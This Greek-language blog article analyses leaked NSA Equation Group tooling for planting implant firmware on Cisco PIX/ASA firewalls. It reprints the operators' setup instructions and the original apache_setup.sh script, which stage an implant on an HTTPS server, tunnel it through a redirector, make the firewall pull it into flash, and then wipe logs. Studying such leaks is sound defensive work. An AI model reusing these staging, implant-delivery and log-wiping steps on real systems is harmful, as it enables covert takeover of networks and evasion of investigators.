Εδώ και χρόνια οι εταιρίες ηλεκτρονικής ασφάλειας γνώριζαν για πολύ στοχευμένες και υψηλής τεχνολογίας επιθέσεις από μία ομάδα αποκαλούμενη «Equation Group» (Ομάδα Εξίσωσης) ή για συντομία EQGRP. Ο λόγος ήταν ότι συχνά χρησιμοποιούσαν τα αρχικά EQGRP σε προγράμματα τους όπως εργαλεία απόκτησης μη εξουσιοδοτημένης πρόσβασης, ιούς απόκρυψης λειτουργιών, κτλ. Ξεκινώντας από την εταιρία ασφάλειας Kaspersky Lab το 2015 αναπτύχθηκε η θεωρία (λόγω των τακτικών και των στόχων τους) ότι πίσω από αυτή την ομάδα υπάρχει κάποιος κρατικός οργανισμός και τελικά, τον Αύγουστο του 2016 επιβεβαιώθηκε ότι ήταν οι ΗΠΑ και συγκεκριμένα η NSA (National Security Agency, Εθνική Υπηρεσία Ασφαλείας).

Μέχρι τον Αύγουστο του 2016 γνωρίζαμε ότι η σκοτεινή EQGRP είχε πάρει πρόσβαση σε υψηλής σημασίας στόχους με πολύ προχωρημένες επιθέσεις. Ενδεικτικά, μερικοί από αυτοί ήταν πυρηνικά εργοστάσια του Ιράν, υπηρεσίες πληροφοριών της Ρωσίας, κυβερνητικοί οργανισμοί του Πακιστάν, κτλ. Τον Αύγουστο του 2016 μία άλλη ομάδα με το ψευδώνυμο «The Shadow Brokers» (Οι Μεσίτες Σκιών) διέρρευσαν στο διαδίκτυο μία συλλογή από εργαλεία του EQGRP τα οποία γνωρίζαμε από τις διαρροές του κυρίου Ε. Σνόουντεν ότι χρησιμοποιούνταν από την NSA. Ολόκληρη η συλλογή ήταν από το 2013 και μέχρι σήμερα κανείς δε ξέρει πως ακριβώς διέρρευσε αλλά όλα τα στοιχεία επιβεβαιώνουν ότι η EQGRP είτε εργάζεται για λογαριασμό της NSA είτε είναι ομάδα μέσα από την NSA. Σύμφωνα με τις μετέπειτα πληροφορίες είναι σχεδόν βέβαιο ότι η EQGRP είναι μία ομάδα από τα τμήματα DNT (Digital Network Technologies, Τεχνολογίες Ψηφιακών Δικτύων) ή CNE (Computer Network Exploitation, Εκμετάλλευση Δικτύων Υπολογιστών) της NSA.

Σταδιακά θα παρουσιάσουμε όλα τα εργαλεία που διέρρευσαν από την EQGRP αλλά θα ξεκινήσουμε με κάτι απλό που δεν είναι τόσο παρουσίαση του εργαλείου όσο των τακτικών και διαδικασιών με ιδιαίτερη βαρύτητα στην επιχειρησιακή ασφάλεια. Σήμερα ένα μεγάλο μέρος του διαδικτύου προστατεύεται από συσκευές τοίχους προστασίας (firewall) της εταιρίας Cisco Systems. Αυτές είναι συσκευές της σειράς ASA (Adaptive Security Appliance, Συσκευή προσαρμοσμένης ασφάλειας) ή της σειράς PIX (Private Internet Exchange, Ιδιωτικό σύστημα επικοινωνίας διαδικτύου) κατά κανόνα. Πρακτικά, αυτές οι συσκευές είναι με απλά λόγια φίλτρα που επιτρέπουν ή απαγορεύουν πρόσβαση σε δίκτυα και υπηρεσίες. Πρέπει να είναι κατανοητό ότι πρόσβαση σε μία τέτοια συσκευή τοίχους προστασίας (ή firewall στα αγγλικά) συνεπάγεται με πρόσβαση σε όλα τα δίκτυα που προστατεύει. Βλέπετε μία συσκευή Cisco ASA 5512-X στη παρακάτω φωτογραφία.

Μέσα στη συλλογή αυτή υπήρχαν τρία προγράμματα απόκτησης πρόσβασης σε συσκευές ASA & PIX της εταιρίας Cisco Systems τα οποία εκμεταλλεύονταν κάποια κενά ασφαλείας που κανείς δε γνώριζε, τουλάχιστον από το 2013. Η εταιρία Cisco άμεσα διόρθωσε τα κενά ασφαλείας μετά τη διαρροή αλλά αυτό δίνει μία ιδέα των δυνατοτήτων μίας σύγχρονης υπηρεσίας πληροφοριών όπως η NSA. Μετά την απόκτηση πρόσβασης στη συσκευή, οι χειριστές της NSA εγκαθιστούν μολυσμένο λογισμικό (firmware) στις συσκευές που τους δίνει σχεδόν μη ανιχνεύσιμη μόνιμη πρόσβαση σε όλες τις λειτουργίες των συσκευών. Εδώ θα δείξουμε βάση των διαρροών το πως έκανε αυτή τη μόνιμη μόλυνση των εκτεθειμένων συσκευών ώστε να μη μπορεί το θύμα να τους εντοπίσει. Είναι μία πολύ διδακτική διαδικασία που μας δείχνει πως δρα ένας προηγμένος χάκερ, είτε είναι από κάποια εγκληματική οργάνωση, είτε από μία υπηρεσία πληροφοριών.

Το πρόγραμμα Apache είναι από τους πιο γνωστούς εξυπηρετητές ιστού και έτσι δεν έχει πολύ νόημα να εμβαθύνουμε σε όλες του τις λεπτομέρειες καθώς αυτό θα απαιτούσε τεράστιο χρόνο και χώρο στην ιστοσελίδα μας. Άρα θα συγκεντρωθούμε στο τι μάθαμε από τη διαρροή και κυρίως τα περιεχόμενα του φακέλου Firewall/TOOLS/Apache/ που τα βλέπετε και παρακάτω.

1972   Jun 11  2013 Apache_Setup.txt
52240  Jun 11  2013 apr-util-0.9.4-17.i386.rpm
898688 Jun 11  2013 httpd-2.0.52-9.ent.i386.rpm
25758  Jun 11  2013 httpd-suexec-2.0.52-9.ent.i386.rpm
34681  Jun 11  2013 httpd.conf
95549  Jun 11  2013 mod_ssl-2.0.52-9.ent.i386.rpm
10972  Jun 11  2013 ssl.conf

Βλέπουμε ότι όλα τα αρχεία έχουν ημερομηνία από τις 11 Ιουνίου του 2013 και όλα τους είναι τα προγράμματα που χρησιμοποιούνται σε δισεκατομμύρια ιστοσελίδες σήμερα. Και στη περίπτωση της ομάδας EQGRP δεν υπάρχει διαφορά σε αυτά. Χρησιμοποιούσαν το Apache (httpd) ως εργαλείο για τις επιθέσεις τους και αυτό είναι και το ενδιαφέρον μέρος του άρθρου μας άλλωστε. Εν συντομία περιγράφουμε τα παραπάνω αρχεία εδώ.

• Apache_Setup.txt
  Οδηγίες χρήσης του, σχεδόν έτοιμου προς χρήση, εξυπηρετητή ιστού Apache από το φάκελο Firewall/TOOLS/Apache.
• apr-util-0.9.4-17.i386.rpm
  Η έκδοση 0.9.4-17 των εργαλείων (utilities ή για συντομία util) του APR (Apache Portable Runtime, Φορητό περιβάλλον εργασίας Apache) που προσφέρει τις απαραίτητες βιβλιοθήκες για να λειτουργεί αξιόπιστα ο εξυπηρετητής Apache.
• httpd-suexec-2.0.52-9.ent.i386.rpm
  Η βιβλιοθήκη suEXEC που δίνει τη δυνατότητα στον εξυπηρετητή Apache να εκτελεί με ασφάλεια (δηλαδή με απλούς χρήστες) προγράμματα CGI και SSI. Αυτή ήταν η έκδοση 2.0.52-9 όπως φαίνεται.
• httpd.conf
  Το αρχείο ρυθμίσεων (ή configuration στα αγγλικά) του εξυπηρετητή Apache.
• mod_ssl-2.0.52-9.ent.i386.rpm
  Η έκδοση 2.0.52-9 από το κομμάτι (module) που διαχειρίζεται την επικοινωνία με κρυπτογράφηση SSL για τον εξυπηρετητή Apache.
• ssl.conf
  Το αρχείο ρυθμίσεων κρυπτογράφησης για τον εξυπηρετητή Apache μέσω του module για SSL που αναφέραμε παραπάνω.

Το πρόγραμμα αυτό χρησιμοποιείται από τους χειριστές της NSA για να στέλνουν μολυσμένο λογισμικό (firmware) σε συσκευές Cisco ASA και Cisco PIX που εν συνεχεία θα τους προσφέρει μόνιμη πρόσβαση για παρακολουθήσεις ή περεταίρω πρόσβαση στο δίκτυο στόχο. Έχοντας μελετήσει τα παραπάνω αλλά και όλα τα υπόλοιπα περιεχόμενα της διαρροής μπορούμε να κατανοήσουμε τη τακτική δράσης τους η οποία έχει αρκετό ενδιαφέρον τόσο από πλευρά της επιχειρησιακής ασφάλειας (για αποφυγή εντοπισμού) όσο και από τη πλευρά της τακτική επίθεσης. Χωρίσαμε τη διαδικασία στα ακόλουθα βήματα.

• Βήμα 1: Πρόσβαση στον υπολογιστή επίθεσης
  Αρχικά, ο χειριστής συνδέεται σε έναν υπολογιστή από όπου θα κάνει την επιχείρηση απόκτησης πρόσβασης. Αυτός ο εξυπηρετητής-υπολογιστής μπορεί είτε να είναι ένα τυχαίο θύμα στο οποίο έχει πάρει παράνομα πρόσβαση η NSA είτε κάποιο σύστημα που δε συνδέεται άμεσα με την υπηρεσία. Π.χ. είναι ένα νοικιασμένο σύστημα από μία εταιρία που παρέχει πρόσβαση στη NSA για τέτοιες επιχειρήσεις.
• Βήμα 2: Προετοιμασία μόλυνσης
  Έχοντας ήδη τα στοιχεία πρόσβασης για τη συσκευή στόχο, ο χειριστής χρησιμοποιεί κάποια εργαλεία για τη κατασκευή του λογισμικού (firmware) που εμπεριέχει κώδικα που δίνει κρυφή πρόσβαση στην NSA για παρακολουθήσεις και πρόσβαση σε όλες τις λειτουργίες της απομακρυσμένης συσκευής.
• Βήμα 3: Δοκιμή
  Ο χειριστής της NSA δοκιμάζει το λογισμικό μόλυνσης σε ένα πραγματικό σύστημα που έχει τα ίδια τεχνικά χαρακτηριστικά με το σύστημα στόχο από το εργαστήριο της NSA. Το κάνει για να επιβεβαιώσει ότι λειτουργεί όπως πρέπει και ότι δε θα δημιουργήσει κάποιο πρόβλημα που ίσως να κάνει το στόχο να αναγνωρίσει ότι δέχεται επίθεση.
• Βήμα 4: Κρυπτογράφηση
  Ο χειριστής εντός του δικτύου της NSA συγκεντρώνει όλα τα εργαλεία (προγράμματα) που θα χρειαστεί κατά την επιχείρηση καθώς και το δοκιμασμένο λογισμικό μόλυνσης και τα κρυπτογραφεί με ένα κλειδί/κωδικό που γνωρίζει μόνο η ομάδα του.
• Βήμα 5: Μεταφορά
  Στη συνέχεια ο χειριστής αντιγράφει το κρυπτογραφημένο φάκελο από το παραπάνω βήμα σε ένα σύστημα της NSA που δε συνδέεται άμεσα με την υπηρεσία και στη συνέχεια κάνει μία εικονική σύνδεση συσκευής στο σύστημα (remote mount) από όπου θα κάνει την επίθεση (δείτε το βήμα 1 για αυτό το σύστημα). Αυτό σημαίνει ότι το σύστημα από όπου θα γίνει η επίθεση έχει μόνο μία εικονική συσκευή που περιέχει το κρυπτογραφημένο φάκελο αλλά αυτό δε βρίσκεται αποθηκευμένο στο τοπικό σύστημα αρχείων. Είναι προσαρτημένο από ένα άλλο σύστημα απομακρυσμένα ώστε μετά την επίθεση να μην αφήσει πολύτιμα εργαλεία και ίχνη στο σύστημα από όπου θα γίνει η επίθεση.
• Βήμα 6: Εγκατάσταση Apache
  Ο χειριστής της NSA αποκρυπτογραφεί το φάκελο και εγκαθιστά το πρόγραμμα Apache που περιγράφουμε σε αυτό το άρθρο. Στη συνέχεια αντιγράφει το μολυσμένο λογισμικό για να μπορεί να το μεταφέρει μέσω του εξυπηρετητή ιστού Apache. Από τις οδηγίες μπορούμε να να καταλάβουμε ακριβώς πως γίνεται αυτό. Για παράδειγμα, αν ο στόχος μας έχει διεύθυνση 1.2.3.4 και το μολυσμένο λογισμικό μας είναι το bg2011_pix633 (το bg είναι από τα αρχικά του προγράμματος εκμετάλλευσης BANANAGLEE της NSA, το 2011 για το έτος και το pix633 για τη συσκευή στόχο, δηλαδή Cisco PIX, έκδοση 6.3.3) για μία επιχείρηση κατά του ΓΕΕΘΑ, τότε ο χειριστής της NSA θα είχε ονομάσει το αρχείο μόλυνσης geetha_1.2.3.4_bg2011_pix633.bin.
• Βήμα 7: Δοκιμή
  Στη συνέχεια ο χειριστής της NSA δοκιμάζει ότι μπορεί να κατεβάσει το μολυσμένο λογισμικό από έναν άλλο υπολογιστή για να επιβεβαιώσει ότι όλα λειτουργούν σωστά. Και κρυπτογραφημένα (μέσω πρωτοκόλλου HTTPS) ώστε να μη μπορεί κάποιος να υποκλέψει το τι στέλνεται και λαμβάνεται στο δίκτυο.
• Βήμα 8: Προετοιμασία στόχουΈχοντας ήδη πρόσβαση στο στόχο από τα άλλα προγράμματα/εργαλεία της συλλογής ο χειριστής κάνει μία ρύθμιση ανακατεύθυνσης στο στόχο όπου του λέει πρακτικά ότι όταν συνδέεται στον εαυτό του σε μία συγκεκριμένη εικονική θύρα να προωθεί το αίτημα στον υπολογιστή από όπου θα κάνει την επίθεση. Βλέπετε σχηματικά αυτή την αναδρομολόγηση εδώ.
  

  

• Βήμα 9: Επίθεση
  Εδώ εκτελείται η εγκατάσταση του μολυσμένου λογισμικού και ενεργοποίηση του στο στόχο. Ακόμα και αν κάποιος μελετήσει τις καταγραφές (logs) του συστήματος θα δει απλά τη συσκευή να ζητάει ένα αρχείο λογισμικού από μία αθώα διεύθυνση αναδρομολόγησης για αναβάθμιση λογισμικού.
• Βήμα 10: Καθάρισμα
  Ο χειριστής ακολουθεί τις οδηγίες για να αφαιρέσει τον εξυπηρετητή Apache από τον υπολογιστή επίθεσης και όλα τα εργαλεία που χρησιμοποιήθηκαν. Έπειτα αφαιρεί τον εικονικό δίσκο που περιέχει το κρυπτογραφημένο φάκελο με τα εργαλεία/προγράμματα που χρησιμοποίησε και διαγράφει όλες τις καταγραφές συστήματος.

Σε αυτό το σημείο ο στόχος έχει μολυνθεί και είναι υπό τον απόλυτο έλεγχο της NSA χωρίς να φαίνεται κάποια άμεση κακόβουλη ενέργεια. Ακόμα και αν κάποιος εντοπίσει την εγκατάσταση της «αναβάθμισης», δε θα είναι σε θέση να βρει από που προήλθε. Ακόμα και αν ο στόχος έχει τόσο καλό σύστημα καταγραφής που δει ότι έγινε μία αναδρομολόγηση πριν την αναβάθμιση προς έναν υπολογιστή, αυτός ο υπολογιστής δεν συνδέεται με την NSA και δεν έχει τίποτα το ύποπτο εγκατεστημένο. Όπως βλέπετε μάθαμε πολλά για την επιχειρησιακή ασφάλεια και τακτικές επίθεσης των ομάδων DNT & CNE της NSA.

Φυσικά, είναι αυτονόητο να ερωτηθεί κανείς εάν το πρόγραμμα εξυπηρετητή ιστού Apache που χρησιμοποιεί η NSA έχει κάποιες μετατροπές από αυτό που χρησιμοποιεί ο υπόλοιπος κόσμος. Οι μόνες διαφορές που εμείς εντοπίσαμε ήταν μερικές βασικές ρυθμίσεις οι οποίες όμως είναι σημαντικές για την επιχειρησιακή ασφάλεια. Αυτές ήταν οι ακόλουθες:

• Μόνο κρυπτογραφημένη επικοινωνία
  Τόσο το αρχείο httpd.conf όσο και το ssl.conf είναι ρυθμισμένα ώστε να μην υπάρχει καμία εικονική θύρα ανοικτή στον εξυπηρετητή Apache εκτός αυτής του πρωτοκόλλου HTTPS. Μάλιστα, προκειμένου να μη μπορεί κάποιος εύκολα να το αναγνωρίσει αλλά και για αποφυγή της σύγκρουσης εάν ένας άλλος εξυπηρετητής ιστού ήδη λειτουργεί στον υπολογιστή από όπου γίνεται η επίθεση αντί για τη προκαθορισμένη εικονική θύρα του πρωτοκόλλου (που είναι η 443) χρησιμοποιείται μία άλλη, τη θύρα 4443.
• Αποφυγή αποστολής πολλών στοιχείων
  Ο εξυπηρετητής Apache έχει ρυθμιστεί ώστε να μη διαρρέει οποιαδήποτε πληροφορία πέρα από αυτές που έχει ένας απλός εξυπηρετητής ιστού.
• Καταγραφή συνδέσεων
  Ο εξυπηρετητής έχει ρυθμιστεί ώστε να κάνει εκτενή καταγραφή των συνδέσεων και αιτημάτων. Παρότι όλα αυτά διαγράφονται μετά την επιχείρηση μπορούν να δώσουν σημαντικές πληροφορίες στο χειριστή όπως: Έκανε κάποιος άλλος έτοιμα στον εξυπηρετητή όσο λειτουργούσε και ποιος; Λειτούργησε κανονικά το αίτημα από το στόχο ή υπήρξε κάποιο σφάλμα;, κτλ.
• Χαμηλό επίπεδο κρυπτογράφησης
  Μία ακόμα αλλαγή είναι η προκαθορισμένη ρύθμιση εντροπίας που έχει οριστεί στα 256-bit αντί για 512-bit που είναι η προκαθορισμένη τιμή. Αυτό έγινε διότι αντί να χρησιμοποιεί κάποια PRNG (Pseudo-Random Number Generator, Γεννήτρια τυχαίων αριθμών) που έχει το σύστημα, έχει ρυθμιστεί να χρησιμοποιεί το builtin που είναι η πηγή από το ίδιο το πρόγραμμα. Με αυτό το τρόπο δε βασίζεται στο σύστημα από το οποίο εκτελείται και αφήνει μικρότερο ίχνος εντοπισμού. Ωστόσο, αυτό το σύστημα προσφέρει μικρότερη εντροπία και άρα γι’αυτό η τιμή μειώθηκε από 512-bit σε 256-bit. Η ίδια ρύθμιση έχει γίνει και στο σύστημα κρυπτογράφησης. Αντί για κάποιο σύστημα που αφορά το συγκεκριμένο σύστημα από όπου εκτελείται η επίθεση, οι ειδικοί της NSA επέλεξαν το builtin για τους ίδιους λόγους, δηλαδή ότι λειτουργεί σε οποιοδήποτε σύστημα καθώς είναι μέρος του εξυπηρετητή Apache.

Καθαρά για θέμα λόγους πληρότητας του άρθρου μας, παραθέτουμε τις οδηγίες εγκαταστάσης από το αρχείο Apache_Setup.txt μεταφρασμένες στα Ελληνικά στη συνέχεια. Δεν είναι κάτι το σημαντικό αλλά ίσως κάποιοι να το θεωρήσουν χρήσιμο υλικό μελέτης.

# Πριν καν ξεκινήσεις την επιχείρηση, χρειάζεται να κατασκευάσεις το λογισμικό για PIX/ASA IOS,
# κρυπτογράφησε το, δοκίμασε το. Φέρε το λογισμικό και το κλειδί αποκρυπτογράφησης στην επιχείρηση.

########## Πως να εγκαταστήσεις Apache στο σταθμό επιχειρήσεως ##########
# Μέταβαση στο φάκλο εργαλείων του Apache
cd /current/bin/FW/Tools/Apache

# Τρέξε πρώτα αυτή την εντολή για να πάρεις τα προγράμματα που θέλεις χωρίς προβλήματα
rpm -e httpd httpd-suexec mod_ssl apr-util

# Τρέξε μετά αυτό για να φορτώσεις τα προγράμματα του Apache
rpm -hiv *.rpm

# Σε αυτό το φάκελο είναι τα αλλαγμένα αρχεία ρυθμίσεων

cp httpd.conf /etc/httpd/conf/httpd.conf 
cp ssl.conf /etc/httpd/conf.d/ssl.conf

# Δημιούργησε ένα δοκιμαστικό αρχείο HTML
echo "<html><body>This is a test</body></html>" > /var/www/html/index.html

# Βάλε το αρχείο λογισμικού που θέλεις να ανεβάσεις/κατεβάσεις σε αυτό το φάκελο
# με ένα συνιθιθσμένο όνομα:
cp /mnt/zip/<project>.<ip>_bg2011_pix633.bin /var/www/html/pix633.bin

# Ρύθμισε τα δικαιώματα πρόσβασης για τα αρχεία στο φάκελο html
chmod 744 /var/www/html/*

# Εκκίνησε τον εξυπηρετητή Apache
service httpd start

# Άνοιξε το περιηγητή ιστού σου για να επιβεβαιώσεις ότι λειτουργεί.
# Πρέπει να λάβεις ένα παράθυρο που θα ζητάει επιβεβαίωση του πιστοποιητικού κρυπτογράφησης.
# Μετά θα λάβεις τη σελίδα index.html που θα λέει "Αυτή είναι μία δοκιμή".
firefox https://127.0.0.1:4443 &

# Κάνε μία απομακρυσμένη αναδρομολόγηση στο 443 για να πηγαίνει στον Apache στο 4443
-tunnel
r 443 127.0.0.1 4443

# Τώρα είσαι έτοιμος να πας στο PIX στόχο και να εκτελέσεις αυτή την εντολή
copy https://<διεύθυνση IP αναδρομολόγησης>:<θύρα εάν δεν είναι 443>/<όνομα αρχείου> flash

# Αποσυνδέσου από το PIX
exit

######## Επαναφορά του Σταθμού Επειχειρήσεων Πίσω στο φυσιολογικό ########
#
# Όταν ολοκληρωθεί το ανέβασμα, σταμάτησε τον Apache
service httpd stop

# Απεγκατέστησε τα εγκατεστημένα προγράμματα
rpm -e httpd httpd-suexec mod_ssl apr-util

# Έπειτα χρειάζεται να διαγράψεις τους φακέλους που απομένουν.
rm -rf /var/log/httpd /etc/httpd /var/www

#### ΑΛΛΕΣ ΠΛΗΡΟΦΟΡΙΕΣ ####
# Για την εγκατάσταση του apache, χρειάζεσαι 3 προγράμματα:
# httpd-2.0.52-19.ent.i386.rpm
# httpd-suexec-2.0.52-19.ent.i386.rpm
# mod_ssl-2.0.52-19.ent.i386.rpm
# apr-util-0.9.4-17.i386.rpm

Φαίνεται ωστόσο, παρότι τα περισσότερα από τα παραπάνω προγράμματα είναι από εκδόσεις του 2004, υπάρχει ένα δεύτερο αρχείο, το Firewall/OPS/apache_setup.sh το οποίο γράφει στο τίτλο του «This script is used to configure Apache on your Opbox for FW Ops» (Αυτό το πρόγραμμα χρησιμοποιείται για τη ρύθμιση του Apache στο Σταθμό Επιχειρήσεων για Επιχειρήσεων Εναντίων Συσκευών Τοίχους Προστασίας). Αυτό το αρχείο πρακτικά είναι μία αυτοματοποίηση όλων των παραπάνω. Δηλαδή η εκτέλεση του κάνει αυτόματα όλα όσα αναφέρονται στις παραπάνω οδηγίες. Βλέπετε το περιεχόμενο του στην αυθεντική του μορφή παρακάτω.

#!/bin/bash
#
# This script is used to configure Apache on your Opbox for FW Ops
#
# Change log: (Please mark changes here)
# 12/15/2010 - Script deployed



echo "*****           Welcome to the Apache Set Up script             *****"
echo "***** Please ensure that your Implant is in /current/bin/FW/OPS *****"

echo -n "What is the name of your implant: "
read _implant

echo -n "What is it named on target (i.e. image.bin pix704.bin): "
read _name




# cd to the Apache tools directory
cd /current/bin/FW/TOOLS/Apache

# Run this first to get the RPM to install without issue
rpm -e httpd httpd-suexec mod_ssl apr-util

# Run this next to load apache rpm's
rpm -hiv *.rpm

# In this directory is modified versions of the config files
cp --reply=yes httpd.conf /etc/httpd/conf/httpd.conf
cp --reply=yes ssl.conf /etc/httpd/conf.d/ssl.conf

# Create a test html file
echo "<html><body>This is a test</body></html>" > /var/www/html/index.html

# Copying and renaming implant
cp --reply=yes /current/bin/FW/OPS/$_implant /var/www/html/$_name


# Set permissions for items in html directory
chmod 744 /var/www/html/*

# Start up the apache server
service httpd start

echo "Launching FireFox to verify setup"
firefox https://127.0.0.1:4443 &

chmod 744 /var/www/html/*

ls -lart /var/www/html/


echo "Some useful pasteables"
echo "----------------------"
echo " "
echo "-tunnel"
echo "r 443 127.0.0.1 4443"
echo " "
echo "copy https://<redirector>/$_name flash:/$_name"
echo " "


echo "Clean up run these:"
echo "service httpd stop"
echo "rpm -e httpd httpd-suexec mod_ssl apr-util"
echo "rm -rf /var/log/httpd /etc/httpd /var/www"

Όπως βλέπετε ακόμα και οι κυβερνοεπιθέσεις από κυβερνητικούς οργανισμούς όπως η NSA των ΗΠΑ δε γίνονται χαοτικά και απερίσκεπτα. Υπάρχει μία πλήρης τεκμηριωμένη μεθοδική διαδικασία που έχει στόχο τη μείωση των πιθανοτήτων ανίχνευσης και αναγνώρισης του επιτιθέμενου ως την NSA. Φυσικά, όσο ο χώρος του κυβερνοπολέμου μεγαλώνει θα βλέπουμε όλο και πιο συχνά τέτοιες διαρροές που μας προσφέρουν πολύτιμες πληροφορίες για το τρόπο δράσης των προηγμένων παικτών του διαδικτύου σήμερα.